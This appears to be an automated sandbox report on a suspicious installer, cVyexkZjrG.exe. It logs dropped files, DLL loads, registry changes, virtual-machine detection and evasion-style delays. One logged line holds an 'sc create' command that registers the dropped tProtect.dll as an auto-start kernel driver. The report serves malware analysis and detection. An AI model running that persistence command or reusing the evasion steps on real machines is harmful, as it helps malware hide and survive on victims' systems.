Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: cVyexkZjrG.exeStatic file information: File size 7370578 > 1048576
Source: cVyexkZjrG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.2172723507.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2172865132.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BB57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00BB57D0
Source: cVyexkZjrG.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343ad8
Source: cVyexkZjrG.tmp.6.drStatic PE information: real checksum: 0x0 should be: 0x343ad8
Source: update.vac.7.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: update.vac.2.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: cVyexkZjrG.exeStatic PE information: real checksum: 0x0 should be: 0x71186a
Source: hrsw.vbc.7.drStatic PE information: real checksum: 0x0 should be: 0x372ce7
Source: tProtect.dll.13.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: cVyexkZjrG.exeStatic PE information: section name: .didata
Source: cVyexkZjrG.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.2.drStatic PE information: section name: .00cfg
Source: update.vac.2.drStatic PE information: section name: .voltbl
Source: update.vac.2.drStatic PE information: section name: .8Tk
Source: cVyexkZjrG.tmp.6.drStatic PE information: section name: .didata
Source: 7zr.exe.7.drStatic PE information: section name: .sxdata
Source: update.vac.7.drStatic PE information: section name: .00cfg
Source: update.vac.7.drStatic PE information: section name: .voltbl
Source: update.vac.7.drStatic PE information: section name: .8Tk
Source: hrsw.vbc.7.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.7.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.7.drStatic PE information: section name: .8Tk
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC586EB push ecx; ret 7_2_6CC586FE
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CB00F00 push ss; retn 0001h7_2_6CB00F0A
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD26F10 push eax; ret 7_2_6CD26F2E
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC8B9F4 push 004AC35Ch; ret 7_2_6CC8BA0E
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD27290 push eax; ret 7_2_6CD272BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B345F4 push 00BDC35Ch; ret 10_2_00B3460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BCFB10 push eax; ret 10_2_00BCFB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BCFE90 push eax; ret 10_2_00BCFEBE
Source: update.vac.2.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: update.vac.7.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: hrsw.vbc.7.drStatic PE information: section name: .8Tk entropy: 7.190790923053346
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\Desktop\cVyexkZjrG.exeFile created: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\update.vacJump to dropped file
Source: C:\Users\user\Desktop\cVyexkZjrG.exeFile created: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cVyexkZjrG.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6838Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2875Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpWindow / User API: threadDelayed 572Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpWindow / User API: threadDelayed 601Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpWindow / User API: threadDelayed 563Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.7 %
